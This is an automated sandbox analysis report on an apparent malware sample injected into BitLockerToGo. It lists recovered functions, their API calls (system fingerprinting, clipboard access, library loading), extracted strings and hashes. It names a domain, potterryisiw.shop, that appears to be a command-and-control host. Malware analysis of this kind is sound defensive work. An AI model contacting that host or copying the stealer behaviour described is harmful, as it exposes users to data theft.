                              Function 0322F96C Relevance: .0, Instructions: 18COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000009.00000002.2819740944.0000000003200000.00000040.00000400.00020000.00000000.sdmp, Offset: 03200000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_9_2_3200000_BitLockerToGo.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 16c75d4e2b644a1e0a729b4aa91399860b11da62fc68493e7969d38309fc8cb4
                              • Instruction ID: 625cd6d414049ea70a7159db41ac9047f8ad6fa43a4e43b685b19cd3aad0a70d
                              • Opcode Fuzzy Hash: 16c75d4e2b644a1e0a729b4aa91399860b11da62fc68493e7969d38309fc8cb4
                              • Instruction Fuzzy Hash: 46F0A5B55083019FD314EF24D658717BBE2BB89304F15C91CD4954B758C7B4A9498B81
                              Function 0322BB9C Relevance: 12.3, APIs: 1, Strings: 6, Instructions: 92memoryCOMMON
                              Download Yara Rule

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 91 322bb9c-322bc20 call 3209450 94 322bc22 91->94 95 322bc76-322bccd SysAllocString 91->95 96 322bc24-322bc72 94->96 98 322bcd7-322bd05 95->98 96->96 97 322bc74 96->97 97->95
                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 00000009.00000002.2819740944.0000000003200000.00000040.00000400.00020000.00000000.sdmp, Offset: 03200000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_9_2_3200000_BitLockerToGo.jbxd
                              Similarity
                              • API ID: AllocString
                              • String ID: !$"$#$%$'$-
                              • API String ID: 2525500382-1983157586
                              • Opcode ID: 3d2626046725d9e07c13ed7102ea418b132ce6ac376f730a4dfc810a363283c8
                              • Instruction ID: f292d0664ab77ca65f8044c8c9bdefe6544d09f2f2fd4888eb1cac210d742b1e
                              • Opcode Fuzzy Hash: 3d2626046725d9e07c13ed7102ea418b132ce6ac376f730a4dfc810a363283c8
                              • Instruction Fuzzy Hash: F7412670108B818ED715CF28C488742BFE1AF56314F08C68DD8E98F39AC7B5E54ACB62
                              Function 03235BD1 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 26COMMON
                              Download Yara Rule

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 600 3235bd1-3235c2b call 323bc60 GetVolumeInformationW
                              APIs
                              • GetVolumeInformationW.KERNELBASE(?,00000000,00000000,?,00000000,00000000,00000000,00000000), ref: 03235C0E
                              Strings
                              Memory Dump Source
                              • Source File: 00000009.00000002.2819740944.0000000003200000.00000040.00000400.00020000.00000000.sdmp, Offset: 03200000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_9_2_3200000_BitLockerToGo.jbxd
                              Similarity
                              • API ID: InformationVolume
                              • String ID: C$\
                              • API String ID: 2039140958-514332402
                              • Opcode ID: 04b6304e49f3b13e4e30b7024c44631993fb6175c6c21ef8db0dde63ae952094
                              • Instruction ID: 66b5209750e1e0790ba6e21ff402fb72bcc72a7cb82effd25ec7af20498b2288
                              • Opcode Fuzzy Hash: 04b6304e49f3b13e4e30b7024c44631993fb6175c6c21ef8db0dde63ae952094
                              • Instruction Fuzzy Hash: FBF092B8294340BFF324EF14EC66F1A7294A754B08F208C1CB256EA1C0DBF4A9008A0D
                              Function 0320A4B0 Relevance: 4.3, APIs: 1, Strings: 1, Instructions: 812libraryCOMMON
                              Download Yara Rule

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 603 320a4b0-320a5a1 604 320a600-320a641 LoadLibraryExW call 3239030 603->604 605 320a5a3 603->605 611 320a643-320a652 604->611 612 320a657-320a805 call 323bc60 * 12 604->612 606 320a5a5-320a5fc 605->606 606->606 608 320a5fe 606->608 608->604 618 320b1e3-320b1f4 611->618 649 320a80b-320a81d 612->649 651 320a82d-320a872 call 32361d0 649->651 652 320a81f-320a828 649->652 659 320a874-320a87e 651->659 655 320a98e-320a992 652->655 655->618 657 320a998-320ac82 655->657 662 320ac84 657->662 663 320accc-320acf0 call 320bca0 657->663 659->659 661 320a880-320a8a6 659->661 664 320a8b3-320a8b6 661->664 665 320a8a8-320a8b1 661->665 666 320ac86-320acc8 662->666 676 320acf2 663->676 677 320acf7-320ae17 663->677 669 320a8b8-320a8bb 664->669 668 320a90e-320a91f call 320b200 665->668 666->666 671 320acca 666->671 675 320a924-320a929 668->675 673 320a8c2-320a909 call 3210170 669->673 674 320a8bd-320a8c0 669->674 671->663 673->669 678 320a90b 673->678 674->678 681 320a92b-320a961 675->681 682 320a92d-320a958 call 320bc60 675->682 683 320b1d6-320b1e1 676->683 684 320ae83-320aeaa call 320c740 677->684 685 320ae19 677->685 678->668 693 320a963-320a967 681->693 682->693 683->618 694 320aeb1-320af25 call 3208d20 684->694 695 320aeac 684->695 686 320ae1b-320ae7f 685->686 686->686 690 320ae81 686->690 690->684 697 320a970-320a978 693->697 698 320a969 693->698 707 320af27 694->707 708 320af8b-320afc2 call 320c740 694->708 699 320b198-320b1ae call 3237c90 695->699 704 320a97a-320a987 697->704 705 320a98c 697->705 698->697 712 320b1b0-320b1c1 699->712 713 320b1b2-320b1bf 699->713 704->649 705->655 711 320af29-320af87 707->711 727 320afc4 708->727 728 320afc9-320b003 call 320c790 708->728 711->711 715 320af89 711->715 719 320b1c8-320b1d2 712->719 713->719 715->708 719->618 726 320b1d4 719->726 726->683 729 320b196 727->729 733 320b005-320b00d 728->733 729->699 734 320b01a-320b038 733->734 735 320b00f-320b0b7 733->735 737 320b03a 734->737 738 320b03c-320b049 734->738 747 320b0b9-320b0c3 735->747 740 320b06c-320b071 737->740 738->740 744 320b04b-320b06a 738->744 742 320b073-320b092 740->742 742->733 744->742 747->747 749 320b0c5-320b0ef 747->749 750 320b0f1-320b0f7 749->750 751 320b15d-320b172 call 320b200 749->751 753 320b0f9-320b0fc 750->753 757 320b174 751->757 758 320b176-320b194 call 320bc60 751->758 755 320b102-320b158 call 3210170 753->755 756 320b0fe-320b100 753->756 755->753 759 320b15a 755->759 756->759 757->729 758->729 759->751
                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 00000009.00000002.2819740944.0000000003200000.00000040.00000400.00020000.00000000.sdmp, Offset: 03200000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_9_2_3200000_BitLockerToGo.jbxd
                              Similarity
                              • API ID: LibraryLoad
                              • String ID: potterryisiw.shop
                              • API String ID: 1029625771-996537020
                              • Opcode ID: 555dab89bf0f8f57af8e2c12320af149fc6d378d99975134c4db25aacc678703
                              • Instruction ID: b11bb304f06307513b56a983624533827d7b8cdd46481679ebe6512499903a7c
                              • Opcode Fuzzy Hash: 555dab89bf0f8f57af8e2c12320af149fc6d378d99975134c4db25aacc678703
                              • Instruction Fuzzy Hash: DA922970518B81CED331DB38D448796BFE16B16324F088A5DD0FB8B6D2D7B5A189CB62
                              Function 032281F7 Relevance: 4.0, APIs: 1, Strings: 1, Instructions: 487COMMON
                              Download Yara Rule
                              Strings
                              Memory Dump Source
                              • Source File: 00000009.00000002.2819740944.0000000003200000.00000040.00000400.00020000.00000000.sdmp, Offset: 03200000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_9_2_3200000_BitLockerToGo.jbxd
                              Similarity
                              • API ID:
                              • String ID: <VX~
                              • API String ID: 0-911688032
                              • Opcode ID: 2f6a2900511a482e403dd74752421e79253915ce71c449a236f4124ab509b425
                              • Instruction ID: b0639432d42c5852b0ba9bfd413a7df569cc1cce74d1ae077cdc6cd85c95cefd
                              • Opcode Fuzzy Hash: 2f6a2900511a482e403dd74752421e79253915ce71c449a236f4124ab509b425
                              • Instruction Fuzzy Hash: 17F18D70504BA28FD326CF39C4907A6BBF1AF56308F0849ADD4EB8B682D739A445CB51
                              Function 032285CC Relevance: 3.9, APIs: 1, Strings: 1, Instructions: 404COMMON
                              Download Yara Rule
                              APIs
                              • GetPhysicallyInstalledSystemMemory.KERNELBASE(?), ref: 0322870F
                              Strings
                              Memory Dump Source
                              • Source File: 00000009.00000002.2819740944.0000000003200000.00000040.00000400.00020000.00000000.sdmp, Offset: 03200000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_9_2_3200000_BitLockerToGo.jbxd
                              Similarity
                              • API ID: InstalledMemoryPhysicallySystem
                              • String ID: <VX~
                              • API String ID: 3960555810-911688032
                              • Opcode ID: d784903f7e55b3e376d054e6b5d72555537ae8e7157d4e0b81cdb231c0b1b55b
                              • Instruction ID: 5a0f38ef6cd247756bce8fabcbd2fce084e37570afd3da09e0a2e0218fefb625
                              • Opcode Fuzzy Hash: d784903f7e55b3e376d054e6b5d72555537ae8e7157d4e0b81cdb231c0b1b55b
                              • Instruction Fuzzy Hash: 59D18C70514B928BD739CF39C490BA7BBE1BF56308F08486DD4EB8B682D739A449CB51
                              Function 03229D61 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 85COMMON
                              Download Yara Rule
                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 00000009.00000002.2819740944.0000000003200000.00000040.00000400.00020000.00000000.sdmp, Offset: 03200000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_9_2_3200000_BitLockerToGo.jbxd
                              Similarity
                              • API ID: FreeLibrary
                              • String ID: v
                              • API String ID: 3664257935-2904040280
                              • Opcode ID: f533a926d2c302a3825d10d8f5cf100005f1bdf99fb3f10642987c3e4749fab4
                              • Instruction ID: 7018f30a083880fa418ea761f2d330b506cca2be14879aacc3b534100b7eaca1
                              • Opcode Fuzzy Hash: f533a926d2c302a3825d10d8f5cf100005f1bdf99fb3f10642987c3e4749fab4
                              • Instruction Fuzzy Hash: 55316930418F928ED325CF34C854BE3BFE2AF56205F08099DD0EB8B252D77A65A9DB50
                              Function 032093C0 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 33COMMON
                              Download Yara Rule
                              APIs
                              Strings
                              • system or character via spellings glyphs a is uses that in their modified other on often reflection or resemblance on it leetspeak, used similarity internet. play eleet the of the replacements of primarily ways, xrefs: 032093F2
                              Memory Dump Source
                              • Source File: 00000009.00000002.2819740944.0000000003200000.00000040.00000400.00020000.00000000.sdmp, Offset: 03200000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_9_2_3200000_BitLockerToGo.jbxd
                              Similarity
                              • API ID: ExitProcess
                              • String ID: system or character via spellings glyphs a is uses that in their modified other on often reflection or resemblance on it leetspeak, used similarity internet. play eleet the of the replacements of primarily ways
                              • API String ID: 621844428-780655312
                              • Opcode ID: 8888e13b6117e7fce99518d344cad79851837f8c12174c3156ecad3f96eb18e1
                              • Instruction ID: 82859e5276a26517a1edcc264efac24077d4e8b1f428c79b377446e9b7ee28c3
                              • Opcode Fuzzy Hash: 8888e13b6117e7fce99518d344cad79851837f8c12174c3156ecad3f96eb18e1
                              • Instruction Fuzzy Hash: B8F012B983831086CB10F7B4A74536D76589F52154F454135D993691E3EBF980CD8EE3
                              Function 03230859 Relevance: 3.1, APIs: 2, Instructions: 59COMMON
                              Download Yara Rule
                              APIs
                              • KiUserCallbackDispatcher.NTDLL ref: 032308AD
                              • GetSystemMetrics.USER32 ref: 032308BC
                              Memory Dump Source
                              • Source File: 00000009.00000002.2819740944.0000000003200000.00000040.00000400.00020000.00000000.sdmp, Offset: 03200000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_9_2_3200000_BitLockerToGo.jbxd
                              Similarity
                              • API ID: CallbackDispatcherMetricsSystemUser
                              • String ID:
                              • API String ID: 365337688-0
                              • Opcode ID: ee56d4aba1dfa07e8a1fccba73653b02c4062adbcf86d678a5856a89c5e76091
                              • Instruction ID: b01dcd31b73d333679b8d2ff7b260d953bfd273a3dff5f6c9a83bdeedf19e7f3
                              • Opcode Fuzzy Hash: ee56d4aba1dfa07e8a1fccba73653b02c4062adbcf86d678a5856a89c5e76091
                              • Instruction Fuzzy Hash: 85217FB4515B008FD360EF3DDA8561ABBE4BB48700F00892DE49AC7754E774B944CF82
                              Function 032107DB Relevance: 1.5, APIs: 1, Instructions: 49COMMON
                              Download Yara Rule
                              APIs
                              • GetSystemDirectoryW.KERNEL32(?,00000104), ref: 032107E1
                              Memory Dump Source
                              • Source File: 00000009.00000002.2819740944.0000000003200000.00000040.00000400.00020000.00000000.sdmp, Offset: 03200000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_9_2_3200000_BitLockerToGo.jbxd
                              Similarity
                              • API ID: DirectorySystem
                              • String ID:
                              • API String ID: 2188284642-0
                              • Opcode ID: 0b3a4fade851f98a1e712e4d44ea14b31910dbc2701d1683f2d0b84c3f6845a5
                              • Instruction ID: 1e41e2894394756889c23551eca4e18383548b26f8743cda75cdb980126e851b
                              • Opcode Fuzzy Hash: 0b3a4fade851f98a1e712e4d44ea14b31910dbc2701d1683f2d0b84c3f6845a5
                              • Instruction Fuzzy Hash: AB01CBFAA242400BD738CA34ADD263BB2A6AFD5014F1D852ED442CF3D2DB7888C0C551
                              Function 03237C52 Relevance: 1.5, APIs: 1, Instructions: 24memoryCOMMON
                              Download Yara Rule
                              APIs
                              • RtlAllocateHeap.NTDLL(?,00000000), ref: 03237C58
                              Memory Dump Source
                              • Source File: 00000009.00000002.2819740944.0000000003200000.00000040.00000400.00020000.00000000.sdmp, Offset: 03200000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_9_2_3200000_BitLockerToGo.jbxd
                              Similarity
                              • API ID: AllocateHeap
                              • String ID:
                              • API String ID: 1279760036-0
                              • Opcode ID: a639a45fd6542bf384c7aecebc1bb85885f057356360ddfb70b292abe0c71050
                              • Instruction ID: 834e7eba972e23db7d68e29158a9252deb3b48843bbd1b9be6282fdce70bb5bd
                              • Opcode Fuzzy Hash: a639a45fd6542bf384c7aecebc1bb85885f057356360ddfb70b292abe0c71050
                              • Instruction Fuzzy Hash: ADC01239288200CBE20CAF14ED19B21332AEB89A01F14C2099822063EAC3B06C12CA84
                              Function 032350A9 Relevance: 1.5, APIs: 1, Instructions: 19COMMON
                              Download Yara Rule
                              APIs
                              • GetUserDefaultUILanguage.KERNELBASE ref: 032350C4
                              Memory Dump Source
                              • Source File: 00000009.00000002.2819740944.0000000003200000.00000040.00000400.00020000.00000000.sdmp, Offset: 03200000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_9_2_3200000_BitLockerToGo.jbxd
                              Similarity
                              • API ID: DefaultLanguageUser
                              • String ID:
                              • API String ID: 95929093-0
                              • Opcode ID: c69d6eddcb22e7b0304295258379c296e898549c4e0519644dfef4d4beae1dde
                              • Instruction ID: ad83386b8292c3ce0f427e9a70950d8c21e9cde115723c8e2e0496875213d2bc
                              • Opcode Fuzzy Hash: c69d6eddcb22e7b0304295258379c296e898549c4e0519644dfef4d4beae1dde
                              • Instruction Fuzzy Hash: CEE04FBD512601CFC318FF7CE5A596A7BE1AB48200F01482DD99AC7385DB30AA408B11
                              Function 03239A51 Relevance: 1.5, APIs: 1, Instructions: 12COMMON
                              Download Yara Rule
                              APIs
                              • GetLogicalDrives.KERNELBASE ref: 03239A51
                              Memory Dump Source
                              • Source File: 00000009.00000002.2819740944.0000000003200000.00000040.00000400.00020000.00000000.sdmp, Offset: 03200000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_9_2_3200000_BitLockerToGo.jbxd
                              Similarity
                              • API ID: DrivesLogical
                              • String ID:
                              • API String ID: 999431828-0
                              • Opcode ID: 2a66be407e089c10b8d8f98d1e89b8bed4255bcc9012de6322cf351893ed02f9
                              • Instruction ID: e786b92770375cf8ed16e001824eaf28ba932c87c318446ae4091f83dfbb3749
                              • Opcode Fuzzy Hash: 2a66be407e089c10b8d8f98d1e89b8bed4255bcc9012de6322cf351893ed02f9
                              • Instruction Fuzzy Hash: E0D0123A6B01408BC348EA25F44D21D2253E388258B49D8249106CB689D63559908A41
                              Function 03237D92 Relevance: 1.5, APIs: 1, Instructions: 10memoryCOMMON
                              Download Yara Rule
                              APIs
                              • RtlFreeHeap.NTDLL(?,00000000), ref: 03237D98
                              Memory Dump Source
                              • Source File: 00000009.00000002.2819740944.0000000003200000.00000040.00000400.00020000.00000000.sdmp, Offset: 03200000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_9_2_3200000_BitLockerToGo.jbxd
                              Similarity
                              • API ID: FreeHeap
                              • String ID:
                              • API String ID: 3298025750-0
                              • Opcode ID: 5f8a9bb5deb2c23a20eb5177244ee1f705617bb614d623ba3538d451e8bd0bba
                              • Instruction ID: 1b2cba3851e3be8dbe9a3efbb2926cc91406ed771b3554bbd5860d583fd3a10b
                              • Opcode Fuzzy Hash: 5f8a9bb5deb2c23a20eb5177244ee1f705617bb614d623ba3538d451e8bd0bba
                              • Instruction Fuzzy Hash: A9C09B76740105DEDE141E94FC057D8B734E740239F204062E61C95091C23255279751

                              Non-executed Functions

                              Function 03230030 Relevance: 9.1, APIs: 6, Instructions: 147clipboardCOMMON
                              Download Yara Rule
                              APIs
                              Memory Dump Source
                              • Source File: 00000009.00000002.2819740944.0000000003200000.00000040.00000400.00020000.00000000.sdmp, Offset: 03200000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_9_2_3200000_BitLockerToGo.jbxd
                              Similarity
                              • API ID: Clipboard$CloseDataLongOpenWindow
                              • String ID:
                              • API String ID: 1647500905-0
                              • Opcode ID: f57a7f16c5b32a69e74d871bf50346896ed9328e1667ab8275e147abafaa26fa
                              • Instruction ID: 18ed8b91e8aa8f011fbe6f6eec1e97b762f009d06ad509b66f2d90859a1bd9de
                              • Opcode Fuzzy Hash: f57a7f16c5b32a69e74d871bf50346896ed9328e1667ab8275e147abafaa26fa
                              • Instruction Fuzzy Hash: D25140B4528B42DFC320DF3CD548656FBE0AB16610F04CB59D4EB8BA91D374E495CBA2
                              Function 0322991D Relevance: 7.3, APIs: 1, Strings: 3, Instructions: 327COMMON
                              Download Yara Rule
                              Strings
                              Memory Dump Source
                              • Source File: 00000009.00000002.2819740944.0000000003200000.00000040.00000400.00020000.00000000.sdmp, Offset: 03200000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_9_2_3200000_BitLockerToGo.jbxd
                              Similarity
                              • API ID:
                              • String ID: b@R7$kPIW$v
                              • API String ID: 0-545134417
                              • Opcode ID: b926364b56b5bb7713880f921c98520d82cffdb5b7f2aab4e2ac820418e20bb3
                              • Instruction ID: b4250a6190f6a7cca6fb16d9191932d50f4cc46634a278bc7de42a54c3408355
                              • Opcode Fuzzy Hash: b926364b56b5bb7713880f921c98520d82cffdb5b7f2aab4e2ac820418e20bb3
                              • Instruction Fuzzy Hash: 65C1EF70554B829BD325CF39C880BA3FBE1BF56314F188A6DD0EB8B692D774A484CB50